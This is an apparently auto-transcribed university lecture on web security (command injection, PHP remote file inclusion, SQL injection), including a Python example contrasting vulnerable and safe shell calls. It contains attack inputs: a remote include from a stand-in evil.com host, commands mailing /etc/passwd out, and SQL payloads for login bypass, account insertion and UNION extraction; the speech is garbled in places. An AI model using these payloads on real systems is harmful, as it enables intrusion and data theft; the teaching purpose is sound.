All right, folks. We got three meetings. Yeah, it's crazy. Think of all those things you learned. You knew nothing when you came in. Disparate your knowledge coming into the sports. You crafted us out of the clay. Yeah, I mean molding young minds is what I do. Okay. Just wanted to ask about the final. What is it going to be? Do you want a final exam? For an hour fifteen minutes? More difficult questions that I come up with to probe your knowledge of everything in my... Ruins, but last... Those are twelve weeks. No one wants to admit in front of a bunch of people yelling no. Extra credit. Extra credit. That's a good, good tracking, you know, you never, you got a... Yeah, here's what I'm thinking we will do. You can call it, maybe we'll have, so we aren't, since we're running several CTFs throughout the year, right? So the CTFs plus your project report will comprise your project grade, and then your team's effort, so your team will get a grade for the final. So the final CTF will be in lieu of a written final. How does that sound? And the project report is one per team, or is it? Yes, project report is one per team. So it's also... That makes sense. Can I repeat that? Yes, so your prop, your project grade, so you have a project report, give a project to you. Correct. Yes. Yes. Yes. Yes, so you also have done three in-class capture the flags, which were all leading up to the project. So all of that will comprise your project. The final CTF that we're having on the 30th. On the 30th. That will count as your final. So basically in lieu of a written final you take a CTF final as a team. Fold it over for the two hours. I think it's an hour or two hours. We'll be super well prepared for it because you've done three in-class CTFs and you have a lot of awesome tools to help you win the final CTF. It's on the left side by that day, I think it's two days after the final, the second. Okay, it's a good plan. How long will the final CTF be online for? That's a good question. How long we needed to extend the other CTFs, right?
Yeah, I think we can put it online until the project deadline. How about that? We'll announce the winner at the end of the... My old CTF at the end of the minute... But... So our... Is there gonna be another 47? No, no, no more. It's not enough time. Otherwise that... Contrary to your opinions, I don't... you completely... So we got, we got the... Hey folks. So we got the, yeah, we got an email with the willow mark so far. Yes. Um, can you tell us what the breakdown is and how that contributes to, like... And so okay, how does the 50% assignments? How does that split, those three assignments 50%? Yes, and the CTFs go under the project? Yes, okay. All right, let's get to it. Yeah, three more web security classes so I can train you to be excellent web security actors. Okay. Okay. Do you have any questions, you know where to email. All right, so switching gears. Can somebody give me an example of where mixing code and data in the same channel causes a security vulnerability? Forms, what does that mean? JavaScript running. Uh... You said executable stacks, right? Yeah, the stack is executable, right? So you literally are storing the user's data in the same, on the same channel, literally the same continuous memory that you also store pointers of where you go and execute things. Right, so the fact that you have user data intermixed with essentially your control flow means that a user... think about if you completely prevent any type of stack overflow nonsense: if there was a completely separate user data stack and a completely separate, uh, basically gip stack, and never the two could ever mix. Like our... Like what?
Yes. Yes, so when you look at the von Neumann architecture versus the Harvard architecture, exactly. So that was the other one of the original styles of designing the CPU, and the von Neumann architecture won out. And so now we have to deal with this problem forever. And as we'll see in almost every single example, a lot of web security vulnerabilities are framed, and you think about that, in this idea. But this should be a general idea that you can take to any new thing where literally, uh, for instance, let's say you're talking to a web service that's generating JSON output, right, or JSON. So your user input is used to create a JSON response. Right, in that case the data would be the data contained inside each element of the JSON entry. But if you can break out of that and add or change or manipulate the JSON from your input, you could potentially change and compromise the security of the application. So the first thing we're going to look at is our old friend, otherwise the command injection attacks. So what were command injection attacks in the look at finance? No, there's no practicing yet. What's that? Now that there's no finding... Yeah, it's just all notes of the way. I'll decide at the end of class. Was this like where we were able to utilize, uh, sound like we'll use restricted characters to chain together commands in a way that wasn't initially intended by the program? Yeah, so what's like a vulnerable function that we looked at? system. system or popen. Right. The idea is, the problem there is you pass a string into system, which then /bin/sh would parse and interpret as some, essentially, shell command. But... and so similar to here, the same thing happens in a web application where you can kind of string things together and pass it to literally sometimes the same functions, like system. So the idea is you have either completely no validation or incorrect validation. So system in the web, though, now you have a different kind of context. We have eval.
So what does eval do? Yeah, it takes a string and just executes it, right? Takes a string, the runtime language interprets it, that's whatever language. So let's talk PHP. So it takes a string, parses it as if it's PHP code, creates an abstract syntax tree and then starts executing it as if that code was in there always. And questions on what execution environment it has, what variables and what scope it has, are language dependent. But in essence, it's turning a string into code. So if you can control the code that goes to eval, you could then inject any arbitrary, let's say, PHP code, which means you can read any file, do anything that the PHP code could do, the same as our remote code execution. Similarly, include, um, could be another one, or require. We're gonna look at that though, but let's look at the example. So the idea would be some either CGI program or PHP application that wants to, let's say... Let's say you write an application and you have a list of bad passwords that can't be used, like a dictionary or something. You want to make sure that their password is not in the dictionary? And you want to follow the privilege of not reinventing, or privilege, the principle of not reinventing the wheel. So you use the correct command. You're not just great at looking through files for, uh, other characters. So you do something like grep. This dollar sign exp is going to be the expression, and then when I have a phone book, this would be a phone book application. So you've seen our example of this in CTF 3 and in the homework assignment. In homework assignment three, where by putting backticks in there or by doing the /bin/sh, the cat thing that we're looking at, you can get a shell there. Here's one case where it's kind of cool. You're using the mail command.
So here you're emailing a file to yourself, so the /etc/passwd file, and then removing the phonebook.txt because you're super mean. So the way to think about, well, you fix this is easy: just like on the command line, you put double quotes around strings and around arguments. This will help because now the previous one would break if there's any spaces, right? It wouldn't be grepping for the right thing. So is this safe? We're secure now? No, why not? Yeah, because now all we need is a double quote to end the original double quote, and then what do we need? How do I call it? And then whatever we want, whatever our payload is. And then what? Yeah, we need to somehow deal with this ending double quote, because no matter what we put in... Right, and this is where it comes from. Literally, the way to think about this is the runtime is concatenating strings together. Right, this grep space double quote is being concatenated with whatever our expression is, which is always with a double quote space phonebook.txt. So you need to have whatever you send be able to be parsed by bash or /bin/sh, because otherwise it's not going to execute. So if you have a trailing double quote, bash is going to say hey, there's a syntax error, it's not a valid command. So you need to be able to handle that. So you can handle that by... I guess actually this one doesn't, and so that's bad. So that would not actually work. So in the case of a different line, because let's say PHP here, depending on the implementation of system you may be able to pass in multiple arguments here. So in this case this would be similar to using the execvp, where you explicitly say I have, this is one two three four, I have four arguments in the program. So argv is only going to be four. It's going to execute grep.
It's going to pass -e and then no matter what you pass in exp. Right, essentially you can think of it as this is parsing that string. Right, we're not using spaces now to separate the arguments and telling bash or /bin/sh to parse that for us. What we're doing is we are pre-parsing it and basically telling the system call, or this call to the system function, that these are the four arguments I'm going to use, and I'm never going to use any more arguments. So it's not possible to create new arguments. Don't do any parsing. So this is actually very tricky to get right, because you need to be very precise about what routine you use. So for instance, if you leave this escapeshellarg, it says: adds single quotes around a string and quotes/escapes any existing single quotes, allowing one to pass a string directly to a shell function and having it be treated as a single safe argument. So this means it's doing... so if you put that within double quotes you may be messing things up, because you're essentially double quoting it and then adding single quotes inside of it. Whereas escapeshellcmd escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands, and that lists all the different strings that are escaped. Only if they are not... wait, this one: tick and double quote, our single quote, double quote, are escaped only if they're not paired. So we as attackers... So when we think about what's our goal with attacking a website, so what does an OS command injection give us the ability to do on the server? Can we access every bit of data on the server? What are we limited to access?
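The phonebook grep built the three ways the lecture contrasts (quoted shell string, properly quoted argument, fixed argument vector), as an added example that is not from the lecture; Python's subprocess stands in for PHP's system/execvp, shlex.quote for escapeshellarg, and the phonebook and the chaining input are constructed.

```python
"""Added example: the lecture's grep phonebook, built three ways.
The constructed input is chosen so that, when /bin/sh re-parses the
concatenated command line, it chains a harmless `echo`."""
import os
import shlex
import subprocess
import tempfile

# Constructed phonebook standing in for the lecture's phonebook.txt.
PHONEBOOK = "Alice 555-0100\nBob 555-0199\n"

# Constructed input: closes the quoted pattern, chains echo, then swallows the
# trailing '" phonebook.txt' that the program always appends.
PAYLOAD = 'x" /dev/null; echo INJECTED; true "'


def write_phonebook() -> str:
    """Write the sample phonebook to a temp file and return its path."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(PHONEBOOK)
    return path


def _run(args: list[str]) -> str:
    """Run a command and return its stdout (stdin closed so grep never waits)."""
    proc = subprocess.run(args, capture_output=True, text=True,
                          stdin=subprocess.DEVNULL)
    return proc.stdout


def grep_shell_string(expr: str, path: str) -> str:
    """Vulnerable: mirrors system("grep -e \\"$exp\\" phonebook.txt").
    The double quotes do not help: the shell re-parses the whole string, so a
    quote in expr ends the argument and ';' starts a new command."""
    cmd = 'grep -e "' + expr + '" ' + path
    return _run(["sh", "-c", cmd])


def grep_shell_quoted(expr: str, path: str) -> str:
    """Escaped: shlex.quote plays the role of PHP's escapeshellarg. It wraps
    expr in single quotes itself, so (as the lecture warns) the caller must
    NOT add its own double quotes around the result."""
    cmd = "grep -e " + shlex.quote(expr) + " " + path
    return _run(["sh", "-c", cmd])


def grep_argv(expr: str, path: str) -> str:
    """Hardened: the lecture's execvp point. The argument vector is fixed at
    four entries and expr is one of them; no shell ever parses it."""
    return _run(["grep", "-e", expr, path])


if __name__ == "__main__":
    p = write_phonebook()
    print("shell string:", repr(grep_shell_string(PAYLOAD, p)))  # 'INJECTED\n'
    print("shell quoted:", repr(grep_shell_quoted(PAYLOAD, p)))  # ''
    print("argv        :", repr(grep_argv(PAYLOAD, p)))          # ''
```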
Yeah, the context of the user, the web server, which in most distros is going to be like www-data. Right, so whatever that user can see. But if we start from the thing where we have no access to any files on the system, we're completely remote attackers, that now gives us additional access. For now we are local attackers and we can do the other types of tricks we talked about, like setuid attacks. Cool. So our goal is essentially to... and we can read things, but we also execute many arbitrary commands, right? We're not just limited to reading files, we can literally do anything we want. So as we saw in PHP, when we look at PHP, PHP has a nice way for you to break up your functionality into different files. Just like when you're writing C you use include, or when you're using Java you can include some other class. Right, which allows you to separate the function out into different modules and include what you need to get the job done. So many languages have this, but the difference is, especially in terms of C or even Java, when is that inclusion done?
See, where Java, too many Javas start like this. Yeah. Right, but when does it include that? Does it include it when you... When you compile it, right? To compile it, it needs, in C, the headers, and in Java's places, or any jars that you're using. So when you compile it, it needs to know all that information. Depending on how you compile it, as we saw, maybe we'll dynamically load it, but it doesn't need to go find random C files and include them. This is in stark contrast to a language like PHP, where the inclusion is done at runtime. So while the PHP code, while the PHP interpreter is executing each line, when it gets to a line that has to include this string or variable, it evaluates that to a string and tries to find that file, to parse that file as PHP code. So what does this mean that we can do as attackers if we control the PHP code, or if we can control, sorry, that string, the included string? You just volunteered yourself for that. Yeah, we can maybe try to point it to a file that we uploaded, or maybe we can point it to a non... I mean depending. So what does PHP do when it interprets a file that does not have PHP tags? It prints it. It just prints it. So we can get it to include /etc/passwd. That will just show us the /etc/passwd file, or any other file that we have access to. And so not only could we maybe upload code into some file, and in this case it doesn't even need to end with the .php extension, because the PHP interpreter doesn't care at that point, because you're telling it explicitly to include this file. We can upload some code somewhere on the same system, as long as the www-data user can access it, then now we've run custom code of our choosing on the remote server. We can also, as we saw, PHP has that facility that you can do remote file include: include an http:// file, or you can include sometimes an FTP file, all kinds of weird... Literally you start digging around in this, this is super weird, all the things you can include. And you may be able to try to influence
or change the path. So this is the directive, or the configuration option, allow_url_fopen. And so yeah, let's say this is our main app.php. It has a variable called include_path, /includes. It's going to include include_path . library.php. And then in library.php it uses the variable include_path to include math.php. And so now here we're changing kind of two behaviors here. So we're using the register_globals, or assuming the code is using register_globals, and this is yet another instance where register_globals is terrible, because the way file include is done in PHP, it's essentially copy that file and paste it in right there, including the scope and everything. So this means a file that you include, for instance here, gets access to all the variables that are defined at that point, which means it's very useful in this other include path, this library.php, to use a variable that was defined before you called it. Yes, so could you include your own PHP and then overwrite the variable as well, to like re... re... overwrite the global variable? And then yes, you could definitely do that, but at that point once you get to execute PHP code it's game over. They're about all the variables like... You could write a shell out, you can do all kinds of fun stuff. There's PHP shells, so if you want to get into this you can get PHP shells. So let's say we have this example here. We're calling library.php, we're setting include_path, we know they have register_globals. What file is going to be included? By the room, by the remote? Yes, http://www.evil.com/math.php. Why math.php?
Yes, always getting appended. Right, so this means if we point this to a domain we control, create a file there that's math.php, and we have to be careful to not interpret that PHP code, because we want to ship a source PHP file, right, not the result of executing that PHP code. If we include that there, then that would be included at runtime and executed on that system. Questions on this? You can also, briefly mention it, I don't know if they've changed this behavior in newer versions of PHP, but you used to be able to deal with appending, the things that got appended. If you made a request, and then if this was the URL you wanted, and you did percent zero zero, again, what does that become? What's percent zero zero if you URL-decode it? A null byte. Then PHP includes just fine and then appends .math.php. So you have http://www.evil.com, null byte, math.php. And then when PHP takes that and sends that to system, like syscalls, right, to fopen this, or url, yeah. What is the underlying runtime language of PHP? Like what does this call? What do syscalls use when you pass, like, in the operating system, I mean generally system calls, like when you call into the operating system, how do you pass values into a system call like read or write or open? What is that? Yeah, but what's the data type? A character pointer, a C null-terminated string. So that you pass that data in there and it includes a null byte, then that system call will completely ignore anything after that and will only execute up to that. I think in like the very latest versions, I see that PHP they'll be thinking to fix this behavior. Do you remember that? Yeah, but it still definitely still happens. And so it's a nice way of, vaguely, getting around, especially older versions of PHP. Cool, okay. Yes, you said math.php has to be like the... the fake math.php has to be done in such a way that it's run by this... So think about exactly what's happening. So we have, so there's three players here.
There's us, or the system that's making the requests. There's the server that's vulnerable, and then there's our evil.com server. So we make the request, this request we saw here. This backend server is going to process that request. It's going to do the include. It's going to try to include evil.com/math.php, which means it's going to make an HTTP request at evil.com/math.php, and whatever gets back in the HTTP body of that request it will interpret as PHP, though. So you need to send it back something with PHP commands, with open tag and close tags. But if you throw that on a server that's executing PHP files, those will not be output unless you do it in a weird way. What is evil.com by default? Outputs math.php? Like what? By default, without even... just evil.com/ will give math.php output without even happening that? If we control the files of evil.com... Yeah, we can pull the files for the root, we can tell it like do this, like output this. So yeah, we actually need to be careful. We actually don't even need, for something like this, we don't even need to... We wouldn't need to run a whole web server. We can just run this up. So we can change the port to make it go to any port, and we can run like netcat to output whatever we want. So we can output the start of an HTTP response with the body of whatever we want, and that will be interpreted. All right, let's go to the next example. So we talked about that web applications very frequently use the data, use a database. Why do they do that?
Exactly, there's no... remember with a web application any user can make any HTTP request at any time, right? And this means you can have multiple concurrent requests. So if you just use files you have to use file locking, so you can have only one person accessing a file necessarily at a time, or you'd be completely destroying the throughput of your application, because every request would have to lock whatever file you're using, use it, and then the next one would spin until they got access. Databases are designed to solve these types of concurrency problems. And how do web applications, like we saw, how do they query the database? Right, I mean, I don't connect, but how does the code of the web application issue queries to the database? So, yes, by SQL queries, right? So there's a structured query language, right, SQL, Structured Query Language, that is defined, which is how people and also web applications query data from the SQL database. So fundamentally, for the web application to get or put any data into the web, into the database, it needs to issue SQL queries. As we've seen, and again, what often ends up happening is web developers will issue SQL queries by concatenating strings together. So they'll have the first part: select star from users where username is equal to dollar sign username and password is equal to dollar sign password. So let's envision that we have this beautiful web page with a username and password. Anybody see a login page before? Anybody see a login page on Internet Explorer 6? That's me, recently. I mean besides the one you're looking at right here. I hope not recently, that'd be... Pity one of these web developers that has to develop sites that still work in IE 6, but do they still do that? Does anyone have that as part of their job description? I would imagine, and also you guys think a lot of corporations, they developed, they bought some big whatever time sheet management software in the early 2000s and it only runs on IE 6. It's using features of IE 6.
So that's why they still have copies of this thing around, so people can use that. It's actually cheaper for them than rewriting the whole application and fixing it, to just force the employees to use a, let's just call it a super old web browser. Cool, okay. So when we dig in, so always, always, always when we're looking at web applications we gotta dig in and look at the source, and the source in this space means the HTML of the page. So we want to look at the HTML source here and say okay, there's a form with an action of login.asp, method of POST. Again, you can turn this, submitting this form, into an HTTP request. Because we're super old school, we're gonna use tables to do the layout rather than CSS. So we have a table, and the things we care about are input fields. So we have input type text name username, and input of type password name password, and a submit button or a reset button, pretty standard. So if we look at the login script, so I noted before, ASP is very similar to PHP. This is one of the things you're dealing with in the lab, you never know, because you never know what the backend web server code is written in. So you may have to deal with things that are written in Node.js, which is JavaScript, or Ruby or Python or ASP.NET or Java, Python, Go. I haven't actually, I'm sure it happens, I think Go is used in a lot of backend services. I don't know about who had that. C++, Lua, yeah, lots of stuff. Lisp. Anyways, I could go on. Lisp is awesome. Reddit, the first version of Reddit was written in Lisp before they rewrote it in Python. Yes. Okay, so the backend code is very much what you'd expect for a login function. So what would you expect a login function to do? Get the username and password from the request and do what with it?
Compare names in the database, check is there a user with this username and password. You should take other security classes to learn how to actually implement this with hashing and salt and all that. We'll let you go with that for now. So we get the username and password from the request. Super easy. You can think of these as helper methods that are parsing it from the URL and the HTTP request, right? So we don't need to go into the details here. It's then creating essentially a connection to a database. So we know there's going to be some database connection. It's then creating the query, right? Again, this is what needs to happen. It needs to make a query to the database. And it selects from pubs dot guests dot s, a table, where username is equal to username and password equals password. Right, this is what we want to check. We want to say does a user exist in our database that has been given the username and password. And then we make the query on the database, and then what do we do after that? How do we know if the user is a valid username and password? What do we check on the return? Well, it's going to give you... Because this is going to be a boolean check, right? So it's going to give you the full results. So this is going to give you every user in that table, so every row in that table that matches the where clause, that has the username of what I gave you and the password of what I gave you. So it's not a boolean. Yes, although login, we may want a boolean from login, right?
Depending on how you run that, but we need to figure out whether the authentication was true or false. And so essentially they're using the count, basically how many rows are returned. If there's no row, if there are no rows returned, then there does not exist a user in the database with the given username and the given password, and say access denied. Otherwise say that access is granted and do other stuff, set cookies and associate the cookie with a session and all that. The key problem here is that this SQL query is being constructed by concatenating strings. And here it's very clear that string concatenation is occurring, right? It's literally... it's not using anything tricky like PHP with dollar sign foo embedded into some string, or it's doing a string interpolation, which Connor loves. So we can look at the database, there's some users in here. And so if we're an attacker and we want to get into this, log into this web application without knowing a user... So we already know username and password, do we care? No, maybe not. We can already get in. Right. What if we don't know username and password? Just what? Just ask for one. Ask for one? Yeah. Ask where you use a SQL query to get the username. Yeah, we'll get there. I thought you meant to ask like Bob for his password, which is basically phishing, so yes, that works. So, okay, so let's work backwards. Where are we trying to get, where are we trying to essentially force the execution to go in this login script? What's that? It's going to be the else condition of access granted. So work backwards. So what has to be true in order for us to get there? Yeah, there needs to be, we need this rs.EOF to be false, which means we need there to be rows returned. So there's one way we can do that, right? We can put in the username and password that we know and that row will be returned. Do we know a username and password?
No, we do not. But our input from username and password... actually, let's draw a picture here. We haven't drawn it. I haven't drawn in a long time, at least in this class. It's so nice. Okay, I know you've all missed it. So we have, let's go text here. Paste, yes. So let's think of it, and again it all comes down to parsing, just like with the system and the popen calls. So what's going to happen? We're going to select star from blah, I'm not gonna write that, where username is equal to, and then single quote, and then something that we put, single quote, and password is equal to single quote, again the second thing we wrote, single quote. Right, so whatever we put for username will be substituted in the first single quotes, whatever we substitute as the second, as the password, we put into the second quotes. And then what happens when our web application takes these bytes and sends it to the SQL server? What is that? It will expand the literal into an SQL query. That's what you're asking, be more specific. So what is it? So what is, so what does the SQL server get from us, the web application? No, it does not get a SQL query, it gets bytes. It gets the byte for S, the byte for E, the byte for L, the byte for E, the byte for C, T, space, blah blah blah blah, maybe until the newline. I actually don't know the exact SQL query syntax, or sorry, data transfer syntax on these sockets, but essentially it's transmitting this as, essentially, as bytes. And then what does the SQL server have to do? It has to parse it, right? It has to parse those bytes and say is this a SQL query, and then if so, what are the semantics of that SQL query? So from the parsing it builds a parse tree and says ah, these are the SQL keywords, it's a select query, it's querying on this table, and it has this where clause of this username and this password. So what our goal is here is, can we give input
to... Because we can, are there any restrictions that we saw that we could put a free username and password? It has to be a string literal, right? So what is that meaning that the enclosed SQL query is going to have encapsulating the... it has to be, it's sort of been... Ah, so these, yes, the question is this username variable comes from request.form username. So there's no checks on the server-side code that says there's no spaces, or that there's only alphanumeric characters, right? So basically anything we give for the username parameter will be input here. Great. So now, so now we can put anything in for this username, right? So what if we just put like foo space bar? And again remember, it all comes down to the SQL server parsing this. It will take this, parse this thing. Ah, this is a select query of all columns from this table and it has these clauses. Right, and foo bar is just a username equals foo bar. So the goal is, can we actually change the syntax of this query by giving a different input? So how could we do that? I would do... Do it and... Single quote, single quote, and then or username equal star. Isn't that like return... I don't think you have to enclose in single quotes, right? Let's just keep going. Okay, so we're putting in our input here, star space or, right, or username equal star. Because I think the query, you don't do single quotes around like asterisks, right? Let's think, depends on the SQL engine. Let's say this, well, we'll figure it out. Okay, otherwise I would just do star instead of for usernames. So, you know what I mean? Okay. Yes. Okay. So this, so just to be 100% clear, this is our input, right? Right, and then you have to like or like username... We want more input. I'm just saying to enclose the second... That's okay. Yeah, that's good. So let's stop for a minute. So let's say we didn't take or username equal star. We'll put foo bar in for password. When the SQL server gets this sequence of bytes, what's it, what are they going to do? It's going to do what?
More specific. Yeah, more specific. What kind of an error? A syntax error. Yes, exactly. It's going to say this is not valid syntax, because you have a single quote here, a single quote here, a single quote here. So you have a non-matching single quote. Can we just get, why can't we just get rid of all of this garbage? Because it's part of the string. Because it's part of this. It's not just part of the string, it's part of the code that executes every single time this script executes. Right, if I concatenate strings together, no matter what we give there will always be this single quote space and password equals space single quote. So we can't just get rid of it, as much as we would like to. So how can we handle this part? I just did the or because I wasn't sure, like, are you... do asterisk, you can do another or, and then or username equal, like username equal another single quote. Just repeat the first where. Or I guess we could be... So that'll match with this. Yeah, and then it'll be equivalent to the other. So now we have username is equal to empty string, which would probably never match, or username is equal to star, match everything, or username is equal to single quote and password equals to something. So there's a little bit of things here we're not 100% sure about, how that and the ors will parse, but it's SQL engine, whether it's leftmost or rightmost, or I don't know. It's a little bit risky because we have this additional and password boss here. So it's good. So the idea here is username equal star should match everything. We can also basically essentially write the tautology here, or one equals one, which will match for every single... Right, so is SQL just for web applications? What's it also for?
Humans. Actually, the goal of SQL and why it looks like this is because the goal was for humans to write queries, so I think it was business people could write queries to query the database. Look at how well that's turned out. Which means if you have SQL, which is essentially a language that was meant for humans... What do we know from class code that you've written? Do you have no idea what it does? Okay, even you yourself wrote... Go back three years and look at some code you wrote in class. So what's one technique you have to try to combat that? What else? Commenting, right. You write comments that say what the code should do, or what the purpose of this code is, right? Sometimes I'm doing something like, I don't even know why this is, you can hear like what this function is supposed to do. Right, so say, in SQL it would be often, if you wrote some query down, it would be nice to have a comment that says what it should do, right? And unlike in... so some SQL engines, and this is where it becomes tricky, some SQL engines use double slashes to go from here to the end of line as a comment, and some do dash dash, and that is an end-of-line comment. And so rather than worry about this or username equals tick, and to match up with this tick exactly, let's just comment it out. And then we don't even care what's after us at all, right? And again, this is because when the SQL server gets this sequence of bytes, it parses it as a SQL query, and so it says oh, a comment, ignore everything after, focus on everything before. So now the query that will parse: select star from this table where username is equal to empty string, which will be nothing, or one equals one. This will return every row of the database, which will then get us past this end-of-file check. Cool. And this is the tick or one equals one dash dash technique. It's kind of a mouthful, but this is the standard, like, baby's first SQL injection. So let's see if there's anything interesting here. Yes, okay, perfect.
And it's all about parsing, right? So here I've styled it such that the SQL keywords aren't bold and everything in comments, after the comment, is gray. So it doesn't matter what we have after that. Cool, and that's the basic idea. So the big... yes? Every single row in that table. So which, if they were checking if the number of rows returned is equal to one, would not work. And that's why this is no... you have to tailor it to what the application is and what that source code is checking for. So in that case, maybe if you knew there was a username of admin, you knew somebody's username, you can do "admin tick or 1=1", and that would match the username admin and only return that one row. And this is really the core part of this technique. But the core part of this technique is not the tick-or-1=1-dash-dash. The key is altering the syntax of a SQL query issued by the database, and this tiny thing, which honestly doesn't seem like much. I mean, yes, it's nice here: you can bypass login, you can maybe return all the rows or whatever. But it's insane, like even just with one thing you can... oftentimes you can download the entire database, so you can get the entire database. Often, depending, and that's pretty much all of them, depending on how, you may be able to inject additional data into the database, and you're able to update different rows in the database. All kinds of super crazy cool stuff. So it depends, and again it depends on what... because, okay, when you think about this, so using the dash dash to comment, that affects what part of the SQL query that the web application is building? After our injection point, right, where our user input is being used. Can you change what came before?
No, fundamentally there's no possible way, because it's concatenating strings. You can't change the bytes that are prepended to your input. You can only change the things that come afterwards. So that's why you can't just change this select into something else magically. But you can have injections into a select, which does cool stuff. As we talked about, you can have an injection into an insert statement, where you can inject multiple entries; you can have an update statement where you could update... So here we'll be updating the password field of a certain user. But again, if you're updating the password and you set the password to be some pass like "foobar tick dash dash", now you change every user's password in the database to foobar, which is just the same thing as knowing everybody's password, right? Which I think was like this class or... I actually did that, I think it was last semester, for 465. I updated the database. I was doing it manually because somebody forgot their password, and I ended up changing everybody's password. It was the end of the semester already, so nobody, I think, knew about it. But it's like, oh, that's not good. Maybe it was this class. I don't think anybody's had this class. Let me check my password now. You've probably forgotten.
Everyone forgot. All right, and then in a delete statement, so here we can do the same thing and delete all of the accounts, right, by altering this where clause. So these are... so you can think about it: they can steal your data, change your data, or delete your data completely with a SQL injection. So SQL injection, in terms of, like, severity of types of vulnerabilities, SQL injection is one of the most severe and critical vulnerabilities that can exist in an application, in a web app. So yes, I guess it would go remote code execution on the top, because from there you can access the database, frequently, and then SQL injection, and then we'll see cross-site scripting with other stuff mixed in. Cool, so other things we can do, depending... and this depends on the back-end database engine. So what's the SQL syntax for separating different queries? And that's part of the SQL; you can actually go look this up. You can look up the syntax of the SQL language. I literally do this all the time, and like in CTFs, when I'm doing some kind of web attack and I think it may be a SQL injection, and so I have to go look up: okay, I know it's Postgres, so I'm going to look up the exact syntax of what Postgres does, so I can take advantage of the syntax. And so the query separator is semicolon. So if you can use semicolon, you can inject multiple queries, so you could not just do selects: you could do inserts, updates, any query command. So this is if the server allows it. So it's dependent on the server and the web application. Sometimes the web app will add, like, change the configuration to allow this. So in this example, so we have our "select star from the user table where username", and then we have semicolon, "insert into the user table user, password values admin, text". So now I've basically... now again, it's all about parsing on the SQL servers.
They get this whole string, including the stuff in gray, parse it, and if it recognizes the semicolons, if it supports multi-statement queries, then it will execute both queries. Which is fairly, I mean, pretty powerful, right? Cool. Okay. The question is, how do we identify these? So what do you think, how would we go about looking for SQL injections? Particularly in a black-box manner, where we don't have access to the source code. So we don't know what the SQL fields are, right? So that's the biggest problem. So we'd have to, like, look at traffic to... what tracks, like, SQL queries from other users? Ah, the queries come from the web application to the database, right? So yeah, usually it'll be running locally; if not, it'll be in some data center that we likely do not control. But yes, that's the core problem. Yes, we can, if we go back to another example, we can insert into this table, but we need to know the columns of user and password with the values of... Having tasks? No, uh, any of these, any keys? Found some keys, you can go ahead and look, don't worry. Do you want to learn about SQL injections? These are mine. Okay. I don't see them up here. Okay, um, so we need to know the columns in order to insert new columns, or we need to know that... in this case, we need to know the column named user and the column named password. And so we need to somehow identify those. What else? But that's more about, when we know there's a SQL injection, how do you take that to actually exploit things, right? So there's different stages, right? There's identifying: does a SQL injection vulnerability exist? And then there's the exploitation of that vulnerability. Similarly in binaries, right, a buffer overflow: you can detect that one likely exists by giving input of size 10,000. If that crashes the app, that means there's likely some kind of buffer overflow or something that is going on. But that doesn't mean you know how to exploit it, right?
Some of you have struggled with those phases, right, going from identifying the vulnerability to exploiting the vulnerability. It definitely takes different skills and requires different things, but it's equally important. So what else, so what are some ideas? You can test the SQL injection. What's that? You'd like the SQL injection... Ah, that's all right. We're trying to find them. But how do we find them? How do you know them? You can look at the spaces. How do we look? Because we don't have the source code, right? So we don't know. So again, all we have is that form. So if we go back to our original page, all we have is the HTML form, and we don't see the code at all, and we don't see any queries that the database issues. You can try using query separators and executing your queries and seeing what happens. Yeah, we can try. So one thing we can use is, we know, or what we've talked about, the SQL server will likely return a syntax error if there's invalid syntax. So we're going to use the blacklist idea and basically put in characters that would be on a blacklist: single quotes, double quotes, semicolons, parentheses, and see what happens, and see if we can cause it to crash, because if the application is well formed, it should not crash based on that input, right? It should tell us that that thing doesn't exist. Is that the only way to test? How would we influence the time? As we show the work, through the SQL injection. So basically we're trying to identify SQL injections first. So how do we do that?
Okay, the basic way is to use a syntax error, and in that syntax error, also the 500. If it returns some parts of the query, we can guess what actually happened before that query... Yes. Yeah, so we can do... so kind of a little academic way of thinking about this is there are kind of two ways: a negative approach, in which case you're trying to cause some error to occur, either a 500 or, sometimes, you'll see a literal SQL, like MySQL, error message, depending on how the application's built. So in this case, like, what if you put user equals tick or double quote, right? What happens? Does the query fail? Another cool way to think about this, and this actually happens a lot, is to use, like, a positive approach: so give input that shouldn't mean anything. So let's say, if you look at a lot of blogs, when you go to the blog post it'll be like blog, whatever, blog id equals five, right? That's the id there, and so presumably there's some SQL query that says select star from blog where id equals five when you pass it. So what if you do... and the interesting thing about SQL, it goes back to syntax, is oftentimes there's functions, like you can add two numbers in your SQL query. So you can look for blog id equals five; you can also do select star where blog id is equal to two plus three, which should return the exact same page, which doesn't make sense if it's not a SQL engine executing that string. So if you pass, so here in this case, 17 plus five, if that returns the entry for 22, then that's likely a SQL injection. So you're not looking for an error; you're looking for a success in this case, which is, I think, an interesting way to think about it. Cool.
Okay, and then we have to go into crazy SQL syntax, of how powerful a SQL injection vulnerability is. So we looked at a select statement. So I kind of made a bold claim earlier where I said we can, using any SQL injection, or let's scope this slightly and say any SQL injection that starts with a select statement, without using multiple queries, we can download the entire database. But if I look at the SQL query in the third bullet in there, it's select star from accounts. How could I ever get any data out of there besides what's in the accounts table? It seems like not, right? Because it seems like that SQL query scopes to the accounts table, because, as I just tried to drill into your head, you cannot change the stuff that happens before. We can't change that into a select star from users, where we want the user information, we want their credit card information. So it goes back to the union operator. So the union operator allows us to merge the results from two queries. So we can say select star from users where foobar union select star from other table, and all of those results we return in one big query. So for instance, this is a terrible example, but, um, I don't know why they repeat, um... So here we're essentially unioning the results of these two queries. Okay, thank you. So the idea is we can use this to extract more information from the database. So for instance, so here we have select id, name, price from product where brand is equal to some brand. Right, so we know that the result set is going to return how many columns? Three columns, right? id, name and price. Which means that we can do a union on another table. Okay, so let's look at this. Uh, let's go... coming back here. And it should be this more often. So I have id, name, price.
